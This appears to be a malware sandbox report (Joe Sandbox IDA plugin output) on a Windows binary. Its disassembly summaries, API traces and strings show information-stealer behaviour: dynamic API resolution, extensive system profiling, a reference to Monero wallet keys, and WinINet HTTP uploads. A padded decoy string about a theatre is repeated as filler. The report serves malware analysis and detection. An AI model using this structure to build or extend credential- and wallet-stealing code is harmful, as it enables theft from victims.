• 8b5979-8b5fe6: InternetOpenA, 8c8b60 (GetSystemTime), InternetConnectA, HttpOpenRequestA, lstrlen, GetProcessHeap/RtlAllocateHeap, HttpSendRequestA, InternetReadFile loop, InternetCloseHandle
• 8c0db7-8c1044 and 8c1077-8c1151: StrCmpCA comparison chains over copied strings
• 8c1a26-8c2699 (system profiling, each helper's result appended to one buffer): 8c7690 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey, via 8c7720), 8c77c0 (GetCurrentProcess, IsWow64Process), 8c7850, 8c78e0, 8c7980 (GetLocalTime, wsprintfA), 8c7a30 (GetTimeZoneInformation, wsprintfA), 8c7b00 (GetUserDefaultLocaleName; 8c8d20 LocalAlloc, CharToOemW), 8c7b90 (GetKeyboardLayoutList, LocalAlloc, GetLocaleInfoA, LocalFree), 8c7d80 (GetSystemPowerStatus), GetCurrentProcessId with 8c9470 (OpenProcess, GetModuleFileNameExA, CloseHandle), 8c7e00 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey), 8c7f60 (GetLogicalProcessorInformationEx, GetLastError, wsprintfA; 8c8a10 RtlAllocateHeap, 8c89f0 HeapFree), 8c7ed0 (GetSystemInfo, wsprintfA), 8c8100 (GlobalMemoryStatusEx, __aulldiv, wsprintfA), 8c87c0 (RtlAllocateHeap, wsprintfA), 8c81f0, 8c8320 called twice (RegOpenKeyExA, RegEnumKeyExA, wsprintfA, RegQueryValueExA, lstrlen, RegCloseKey), 8c8680 (CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle), then 8c5190 -> 8b5100
• 8b5100-8b5913: 8b47b0 (lstrlen, InternetCrackUrlA), 8c8ea0 (CryptBinaryToStringA twice with RtlAllocateHeap in between), InternetOpenA, StrCmpCA, 8c8b60, InternetConnectA, HttpOpenRequestA, InternetCloseHandle
• 8b5009-8b50ec: InternetOpenUrlA, InternetReadFile loop, InternetCloseHandle x2
• 8c0759-8c0a49: 8b98d0 first, then StrCmpCA dispatch with string copies; 8c0250 path calls 8c8de0; 8bfb00 reached from 8c083e
• 8b9ac0: LocalAlloc, CryptStringToBinaryA, LocalFree
• 8b6d40-8b6f41 (reached via 8b98d0 -> 8b9880 -> 8b6fb0): 8b6530 (RtlAllocateHeap, VirtualAlloc x2), 8b69b0 (LoadLibraryA, GetProcAddress loop, RtlAllocateHeap/HeapFree), then VirtualFree, FreeLibrary, HeapFree

Control-flow Graph (basic blocks of the function at 8c9860; the Executed / Not Executed colouring of the rendered graph is not recoverable as text)
• 8c9860-8c9874: call 8c9750, then either falls into the next block or branches straight to 8c9a93
• 8c987a-8c9a8e: call 8c9780, GetProcAddress * 21
• 8c9a93-8c9af2: LoadLibraryA * 5
• 8c9af4-8c9b08: GetProcAddress (conditional)
• 8c9b0d-8c9b14 -> 8c9b16-8c9b41: GetProcAddress * 2 (conditional)
• 8c9b46-8c9b4d -> 8c9b4f-8c9b63: GetProcAddress (conditional)
• 8c9b68-8c9b6f -> 8c9b71-8c9b84: GetProcAddress (conditional)
• 8c9b89-8c9b90 -> 8c9b92-8c9bbc: GetProcAddress * 2 (conditional)
• 8c9bc1-8c9bc2: exit block
                                APIs
                                • GetProcAddress.KERNEL32(76F70000,007B0708), ref: 008C98A1
                                • GetProcAddress.KERNEL32(76F70000,007B0720), ref: 008C98BA
                                • GetProcAddress.KERNEL32(76F70000,007B0540), ref: 008C98D2
                                • GetProcAddress.KERNEL32(76F70000,007B0570), ref: 008C98EA
                                • GetProcAddress.KERNEL32(76F70000,007B0738), ref: 008C9903
                                • GetProcAddress.KERNEL32(76F70000,007B8B18), ref: 008C991B
                                • GetProcAddress.KERNEL32(76F70000,007A6440), ref: 008C9933
                                • GetProcAddress.KERNEL32(76F70000,007A6360), ref: 008C994C
                                • GetProcAddress.KERNEL32(76F70000,007B0768), ref: 008C9964
                                • GetProcAddress.KERNEL32(76F70000,007B0780), ref: 008C997C
                                • GetProcAddress.KERNEL32(76F70000,007B07C8), ref: 008C9995
                                • GetProcAddress.KERNEL32(76F70000,007B05B8), ref: 008C99AD
                                • GetProcAddress.KERNEL32(76F70000,007A6200), ref: 008C99C5
                                • GetProcAddress.KERNEL32(76F70000,007B07E0), ref: 008C99DE
                                • GetProcAddress.KERNEL32(76F70000,007B07F8), ref: 008C99F6
                                • GetProcAddress.KERNEL32(76F70000,007A6380), ref: 008C9A0E
                                • GetProcAddress.KERNEL32(76F70000,007B0510), ref: 008C9A27
                                • GetProcAddress.KERNEL32(76F70000,007B0810), ref: 008C9A3F
                                • GetProcAddress.KERNEL32(76F70000,007A61C0), ref: 008C9A57
                                • GetProcAddress.KERNEL32(76F70000,007B0828), ref: 008C9A70
                                • GetProcAddress.KERNEL32(76F70000,007A6220), ref: 008C9A88
                                • LoadLibraryA.KERNEL32(007B0858,?,008C6A00), ref: 008C9A9A
                                • LoadLibraryA.KERNEL32(007B0840,?,008C6A00), ref: 008C9AAB
                                • LoadLibraryA.KERNEL32(007B08D0,?,008C6A00), ref: 008C9ABD
                                • LoadLibraryA.KERNEL32(007B0870,?,008C6A00), ref: 008C9ACF
                                • LoadLibraryA.KERNEL32(007B0888,?,008C6A00), ref: 008C9AE0
                                • GetProcAddress.KERNEL32(76DA0000,007B08A0), ref: 008C9B02
                                • GetProcAddress.KERNEL32(75840000,007B08B8), ref: 008C9B23
                                • GetProcAddress.KERNEL32(75840000,007B8E68), ref: 008C9B3B
                                • GetProcAddress.KERNEL32(753A0000,007B8D30), ref: 008C9B5D
                                • GetProcAddress.KERNEL32(77300000,007A6340), ref: 008C9B7E
                                • GetProcAddress.KERNEL32(774D0000,007B89E8), ref: 008C9B9F
                                • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 008C9BB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: bz$@cz$@dz$NtQueryInformationProcess$`cz
                                • API String ID: 2238633743-4183257078
                                • Opcode ID: d8fad22eec35de99e584ca8ed679c8becd86fbbc8a08cbbdd197a5753f1746f7
                                • Instruction ID: b97f877214e1f3ceb7ae826b7c3eb6273095f67e1304805283b69de7f9ec39ca
                                • Opcode Fuzzy Hash: d8fad22eec35de99e584ca8ed679c8becd86fbbc8a08cbbdd197a5753f1746f7
                                • Instruction Fuzzy Hash: 8AA11CF66002419FD344EFE9ED88EF677F9F768381704851AA60DC3264D679A843CB92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 8b45c0-8b4695 RtlAllocateHeap 781 8b46a0-8b46a6 764->781 782 8b474f-8b47a9 VirtualProtect 781->782 783 8b46ac-8b474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008B479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4770
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 92cb8141e72b4fbfc1e7b1fab95b841adc14196f8c5edee2eedfeebf2d26a1b1
                                • Instruction ID: 39e52d6ccc9f641453cad8f004a839c03eecf0cab7dd3f83c2c1f474e6f07854
                                • Opcode Fuzzy Hash: 92cb8141e72b4fbfc1e7b1fab95b841adc14196f8c5edee2eedfeebf2d26a1b1
                                • Instruction Fuzzy Hash: F94178A17C1604FAE676B7A4A84ED9D7352FFCA709F806143ED60923C4DFB4650047B1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 8b4880-8b4942 call 8ca7a0 call 8b47b0 call 8ca740 * 5 InternetOpenA StrCmpCA 816 8b494b-8b494f 801->816 817 8b4944 801->817 818 8b4ecb-8b4ef3 InternetCloseHandle call 8caad0 call 8b9ac0 816->818 819 8b4955-8b4acd call 8c8b60 call 8ca920 call 8ca8a0 call 8ca800 * 2 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca920 call 8ca8a0 call 8ca800 * 2 InternetConnectA 816->819 817->816 829 8b4f32-8b4fa2 call 8c8990 * 2 call 8ca7a0 call 8ca800 * 8 818->829 830 8b4ef5-8b4f2d call 8ca820 call 8ca9b0 call 8ca8a0 call 8ca800 818->830 819->818 905 8b4ad3-8b4ad7 819->905 830->829 906 8b4ad9-8b4ae3 905->906 907 8b4ae5 905->907 908 8b4aef-8b4b22 HttpOpenRequestA 906->908 907->908 909 8b4b28-8b4e28 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca9b0 call 8ca8a0 call 8ca800 call 8ca920 call 8ca8a0 call 8ca800 call 8ca740 call 8ca920 * 2 call 8ca8a0 call 8ca800 * 2 call 8caad0 lstrlen call 8caad0 * 2 lstrlen call 8caad0 HttpSendRequestA 908->909 910 8b4ebe-8b4ec5 InternetCloseHandle 908->910 1021 8b4e32-8b4e5c InternetReadFile 909->1021 910->818 1022 8b4e5e-8b4e65 1021->1022 1023 8b4e67-8b4eb9 InternetCloseHandle call 8ca800 1021->1023 1022->1023 1024 8b4e69-8b4ea7 call 8ca9b0 call 8ca8a0 call 8ca800 1022->1024 1023->910 1024->1021
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008B4915
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008D0DDB,00000000,?,?,00000000,?,",00000000,?,007BE250), ref: 008B4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008B4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008B4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008B4E49
                                • InternetCloseHandle.WININET(00000000), ref: 008B4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 008B4EC5
                                • HttpOpenRequestA.WININET(00000000,007BE2F0,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B4B15
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • InternetCloseHandle.WININET(00000000), ref: 008B4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------$P{$p{$p{
                                • API String ID: 460715078-799811875
                                • Opcode ID: 1336d73ae642df7dcd55c386020f356a5477235d8036634a24e0cb6d6486dbde
                                • Instruction ID: 8ca2b7abe8341718c3fbd10aa5d476ee3e2c4795d8dcfcaf280c7955ff6d247c
                                • Opcode Fuzzy Hash: 1336d73ae642df7dcd55c386020f356a5477235d8036634a24e0cb6d6486dbde
                                • Instruction Fuzzy Hash: D312D77191011CABDB19EB94DC92FEEB738FF14304F5041ADB106A2191EF70AE4ACB66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 4c99ba31c83c2c8bd6a77c54cc4b5db9052699eaa404cfcaa99e35e84e07aa9e
                                • Instruction ID: f4defaada655af7f12af43a9b046d29e705d0eb836013aefa6f71268206d04fb
                                • Opcode Fuzzy Hash: 4c99ba31c83c2c8bd6a77c54cc4b5db9052699eaa404cfcaa99e35e84e07aa9e
                                • Instruction Fuzzy Hash: 300162B1904208EFC700DFD4DD45FAABBB8F704B65F10421AE645E3280C37899048BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
